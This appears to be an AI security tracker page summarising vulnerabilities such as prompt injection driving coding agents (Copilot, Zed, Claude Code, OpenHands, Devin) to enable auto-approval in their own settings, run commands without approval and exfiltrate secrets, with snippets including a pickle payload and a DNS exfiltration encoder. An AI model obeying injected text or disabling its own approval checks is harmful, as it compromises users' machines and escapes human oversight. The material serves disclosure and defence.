All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
GitHub Copilot and VS Code are vulnerable to prompt injection (tricking an AI by hiding instructions in its input) that allows an attacker to achieve RCE (remote code execution, where an attacker can run commands on a system they don't own) by modifying a project's settings.json file to put Copilot into 'YOLO mode'. This vulnerability demonstrates a broader security risk: if an AI agent can write to files and modify its own configuration or security settings, it can be exploited for full system compromise.
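The core risk above is an agent silently flipping its own auto-approval setting. As a rough illustration (not an official detection tool), the sketch below scans a checkout for VS Code workspace settings that enable tool auto-approval; the key name `chat.tools.autoApprove` is an assumption drawn from public write-ups of this issue.

```python
import json
from pathlib import Path

# Settings an agent (or attacker) might flip to bypass confirmation prompts.
# The key name is an assumption based on public write-ups, not an official list.
SUSPICIOUS_KEYS = {"chat.tools.autoApprove"}

def audit_settings(repo_root: str) -> list[str]:
    """Flag VS Code settings files that auto-approve agent tool calls."""
    findings = []
    for settings_file in Path(repo_root).rglob(".vscode/settings.json"):
        try:
            config = json.loads(settings_file.read_text())
        except (OSError, json.JSONDecodeError):
            continue
        if not isinstance(config, dict):
            continue
        for key in config.keys() & SUSPICIOUS_KEYS:
            if config[key] is True:
                findings.append(f"{settings_file}: {key} enabled")
    return findings
```

Running a check like this in CI would catch a workspace config that an agent rewrote mid-session, which is exactly the step the attack relies on.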
CVE-2025-53773 is a command injection vulnerability (a flaw where special characters in user input are not properly filtered, allowing an attacker to run unauthorized commands) found in GitHub Copilot and Visual Studio that lets an unauthorized attacker execute code on a user's local computer. The vulnerability exploits improper handling of special elements in commands, potentially through prompt injection (tricking the AI by hiding malicious instructions in its input).
OpenAI released GPT-5, a system combining two models: a fast base model for creative tasks and a reasoning model for coding and math, which routes queries appropriately based on user input. GPT-5 achieves state-of-the-art performance on several benchmarks and significantly reduces hallucinations (false information generation) compared to previous models, particularly helping with healthcare applications where accuracy matters. However, GPT-5 is best understood as consolidating features from models released since GPT-4 rather than as a major leap forward, and it doesn't lead on all benchmarks.
Zed, a multiplayer code editor, had a vulnerability before version 0.197.3 where an AI agent could bypass permission checks and achieve RCE (remote code execution, where an attacker can run commands on a system they don't own) by creating or modifying configuration files without user approval. This allowed the AI agent to execute arbitrary commands on a victim's machine.
ModelCache for LLM through version 0.2.0 contains a deserialization vulnerability (a flaw where untrusted data is converted back into code objects, potentially allowing attackers to run malicious code) in the /manager/data_manager.py component that allows attackers to execute arbitrary code by supplying specially crafted data.
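Why unsafe deserialization leads straight to code execution is easy to demonstrate with Python's `pickle` (a common culprit in this class of bug; whether ModelCache uses `pickle` specifically is an assumption, the pattern is the same for any unsafe deserializer):

```python
import pickle

class EvilPayload:
    """Demonstration payload: deserializing it runs attacker-chosen code."""
    def __reduce__(self):
        # On unpickling, Python calls eval("6 * 7") -- a harmless stand-in
        # for arbitrary attacker code such as os.system(...).
        return (eval, ("6 * 7",))

crafted = pickle.dumps(EvilPayload())

# A vulnerable component that blindly deserializes stored data
# (a stand-in for the flawed data manager, not its actual code):
result = pickle.loads(crafted)
print(result)  # the code embedded in the serialized bytes has executed
```

The takeaway: deserializing untrusted bytes is equivalent to executing them, so cache entries and model artifacts from outside sources must be treated as code, not data.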
CVE-2025-8747 is a safe mode bypass vulnerability in Keras (a machine learning library) versions 3.0.0 through 3.10.0 that allows an attacker to run arbitrary code (execute any commands they want) on a user's computer by tricking them into loading a specially designed `.keras` model file. The vulnerability has a CVSS score (severity rating) of 8.6, indicating it is a high-risk security problem.
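Since this CVE is a bypass of Keras's `safe_mode`, upgrading past 3.10.0 matters more than relying on `safe_mode=True` alone. As an extra illustrative precaution (a heuristic sketch, not an official scanner; the archive layout is an assumption from the published `.keras` v3 format notes), one can inspect a `.keras` file before loading it, since it is a zip archive whose `config.json` describes the architecture, and `Lambda` layers are the usual carrier for embedded code:

```python
import io
import json
import zipfile

def contains_lambda_layer(keras_bytes: bytes) -> bool:
    """Pre-load heuristic: read config.json out of the .keras zip archive
    and flag any Lambda layer, which can embed serialized Python code."""
    with zipfile.ZipFile(io.BytesIO(keras_bytes)) as archive:
        config_text = archive.read("config.json").decode("utf-8")
    return '"Lambda"' in config_text
```

A string match like this is crude (it can false-positive on layer names), but it shows the shape of a defense-in-depth check that runs before any deserialization happens.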
Claude Code, a feature in Anthropic's Claude AI, had a high severity vulnerability (CVE-2025-55284) that allowed attackers to use prompt injection (tricking an AI by hiding instructions in its input) to hijack the system and steal sensitive information like API keys by sending DNS requests (network queries that reveal data to external servers). The vulnerability affected developers who reviewed untrusted code or processed external data, as attackers could make Claude Code run bash commands (low-level system commands) without user permission to leak secrets.
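DNS is an attractive exfiltration channel because merely *resolving* a hostname leaks its labels to whoever runs the authoritative server. The sketch below (illustrative only; it sends nothing and `evil.example` is a placeholder) shows how a secret can be packed into a DNS query name:

```python
import base64

def secret_to_dns_query(secret: str, attacker_domain: str) -> str:
    """Encode a secret into DNS labels under an attacker-controlled domain.
    Resolving the resulting name would leak the secret; this function only
    builds the string and performs no network activity."""
    # Base32 keeps the payload within the DNS hostname character set.
    encoded = base64.b32encode(secret.encode()).decode().rstrip("=").lower()
    # DNS labels are limited to 63 bytes, so long secrets are chunked.
    labels = [encoded[i:i + 63] for i in range(0, len(encoded), 63)]
    return ".".join(labels + [attacker_domain])

query = secret_to_dns_query("sk-test-key", "evil.example")
```

This is why egress controls for agentic tools need to cover DNS resolution, not just HTTP requests: a single `ping` or `nslookup` bash command is enough to complete the theft.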
The EU Whistleblowing Directive (2019) protects people who report violations of EU law, including violations of the EU AI Act starting August 2, 2026, by requiring organizations to set up reporting channels and prohibiting retaliation against whistleblowers. Whistleblowers can report internally within their organization, to government authorities, or publicly in certain urgent situations, and various institutions offer free legal and technical support to help protect them.
OpenHands, a popular AI agent from All Hands AI that can now run as a cloud service, is vulnerable to prompt injection (tricking an AI by hiding instructions in its input) when processing untrusted data like content from websites. This vulnerability allows attackers to hijack the system and compromise its confidentiality, integrity, and availability, potentially leading to full system compromise.
The skops Python library (used for sharing scikit-learn machine learning models) has a security flaw in versions 0.12.0 and earlier where the Card.get_model function can accidentally use joblib (a less secure loading method) instead of skops' safer approach. Joblib allows arbitrary code execution (running any code during model loading), which could let attackers run malicious code if they trick users into loading a specially crafted model file. This bypasses the security checks that skops normally provides.
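A coarse way to see the hazard: skops archives are zip files, while joblib/pickle artifacts are raw pickle streams. The guard below (an illustrative pre-check under that assumption, not the library's actual fix, which is the 0.13.0 upgrade) refuses files whose magic bytes look like pickle before any loader touches them:

```python
def looks_like_pickle(path: str) -> bool:
    """Heuristic guard: return True for files that appear to be raw
    pickle/joblib rather than a skops zip archive.  Pickle protocol 2+
    streams start with b'\\x80'; zip archives start with b'PK\\x03\\x04'.
    Conservatively treats anything that is not a zip as suspect."""
    with open(path, "rb") as f:
        magic = f.read(4)
    if magic.startswith(b"\x80"):
        return True
    return not magic.startswith(b"PK\x03\x04")
```

Checking file magic is not a substitute for the library's own type-allowlisting, but it cheaply blocks the "swap in a joblib file" trick this flaw relied on.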
CVE-2025-53767 is a vulnerability in Azure OpenAI that allows elevation of privilege, which means an attacker could gain higher-level access than they should have. The vulnerability stems from server-side request forgery (SSRF, a flaw where an attacker tricks a server into making unintended requests on their behalf). The CVSS severity score and detailed impact information have not yet been assessed by NIST.
CVE-2025-53787 is an information disclosure vulnerability in Microsoft 365 Copilot BizChat that stems from improper neutralization of special elements used in commands (command injection, where attackers manipulate input to execute unintended commands). The vulnerability allows unauthorized access to sensitive information, though specific attack details are not provided in this source.
CVE-2025-53774 is an information disclosure vulnerability in Microsoft 365 Copilot BizChat caused by improper neutralization of special elements used in commands (command injection, where attackers craft malicious input to execute unintended commands). The vulnerability allows unauthorized access to sensitive information, though the severity rating has not yet been assigned by the National Institute of Standards and Technology.
Ollama v0.1.33 has a vulnerability (CVE-2025-44779) that allows attackers to delete arbitrary files (any files on a system) by sending a specially crafted request to the /api/pull endpoint. The vulnerability stems from improper input validation (the software not properly checking user input for malicious content) and overly permissive file access settings.
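The missing check here is the classic path-traversal guard: resolve the user-supplied name against the server's data directory and refuse anything that escapes it. A minimal sketch (illustrative only, not Ollama's actual code):

```python
import os

def safe_delete_path(base_dir: str, user_supplied: str) -> str:
    """Resolve a user-supplied file name against base_dir and refuse
    anything that escapes it -- the check whose absence enables
    arbitrary file deletion via crafted API requests."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_supplied))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes model directory: {user_supplied}")
    return target
```

Using `realpath` before the containment check also defeats `..` sequences and symlink tricks that survive naive string filtering.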
CVE-2025-23335 is a vulnerability in NVIDIA Triton Inference Server (a tool that runs AI models on servers) for Windows and Linux where an attacker could trigger an integer underflow (a math error where a number wraps around to a very large value) using a specially crafted model setup and input, potentially causing a denial of service (making the system crash or become unavailable).
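An integer underflow is easiest to see with fixed-width unsigned arithmetic. The toy below (illustrative only, not Triton's code) mimics a "remaining bytes" calculation going below zero and wrapping to a huge value, the kind of result that turns into an enormous copy or allocation and a crash:

```python
import ctypes

def remaining_bytes(buffer_len: int, consumed: int) -> int:
    """Mimic unsigned 32-bit subtraction: going below zero wraps around
    instead of producing a negative number."""
    return ctypes.c_uint32(buffer_len - consumed).value

remaining_bytes(10, 12)  # wraps to 4294967294 instead of -2
```

In native server code the wrapped value is then trusted as a length, which is why a crafted model configuration plus input is enough to trigger a denial of service.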
Fix: Zed patched this vulnerability in version 0.197.3. As a workaround, users can either avoid sending prompts to the Agent Panel or limit the AI agent's file system access.
Fix: Anthropic fixed the Claude Code vulnerability in early June.
OpenHands, an AI agent tool created by All Hands AI, has a vulnerability where it can render images in chat conversations, which attackers can exploit through prompt injection (tricking an AI by hiding instructions in its input) to leak access tokens (security credentials that grant permission to use services) without requiring user interaction. This type of attack has been called the 'Lethal Trifecta' and represents a significant data exfiltration (unauthorized data theft) risk.
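Zero-click image exfiltration works because rendering `![...](https://attacker/...?d=SECRET)` makes the client fetch the URL, secret included. One plausible mitigation pattern (an illustrative sketch under assumed names, not OpenHands' actual fix) is to strip image references to non-allowlisted hosts from model output before rendering:

```python
import re

# Hosts the chat UI is allowed to fetch images from (assumed policy).
ALLOWED_HOSTS = {"localhost", "127.0.0.1"}

# Matches markdown images: ![alt](http(s)://host/path), capturing the host.
IMAGE_RE = re.compile(r"!\[[^\]]*\]\((https?://([^/\s)]+)[^)]*)\)")

def strip_untrusted_images(markdown: str) -> str:
    """Replace markdown images pointing at non-allowlisted hosts, so
    rendering a reply cannot beacon data to an attacker's server."""
    def replace(match: re.Match) -> str:
        host = match.group(2).split(":")[0].lower()
        return match.group(0) if host in ALLOWED_HOSTS else "[image removed]"
    return IMAGE_RE.sub(replace, markdown)
```

Output sanitization like this closes the rendering leg of the 'Lethal Trifecta' even when the prompt-injection leg cannot be fully prevented.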
This content discusses security challenges in agentic AI (AI systems that can act autonomously and use tools), emphasizing that generic jailbreak testing (attempts to trick AI into ignoring safety guidelines) misses real operational risks like tool misuse and data theft. The articles highlight that enterprises need contextual red teaming (security testing that simulates realistic attack scenarios relevant to how the AI will actually be used) and governance frameworks like identity controls and boundaries to secure autonomous AI systems.
Devin AI has a tool called expose_port that can publish local computer ports to the public internet, intended for testing websites during development. However, attackers can use prompt injection (tricking an AI by hiding instructions in its input) to manipulate Devin into exposing sensitive files and creating backdoor access without human approval, as demonstrated through a multi-stage attack that gradually steers the AI toward malicious actions.
Fix: This issue is fixed in skops 0.13.0; users should upgrade to version 0.13.0 or later.
Devin AI can be tricked into leaking sensitive information to attackers through multiple methods, including using its Shell tool to run data-stealing commands, using its Browser tool to send secrets to attacker-controlled websites, rendering images from untrusted domains, and posting hidden data to connected services like Slack. These attacks work because Devin has unrestricted internet access and can be manipulated through indirect prompt injection (tricking an AI by hiding malicious instructions in its input), where attackers embed instructions in places like GitHub issues that Devin investigates.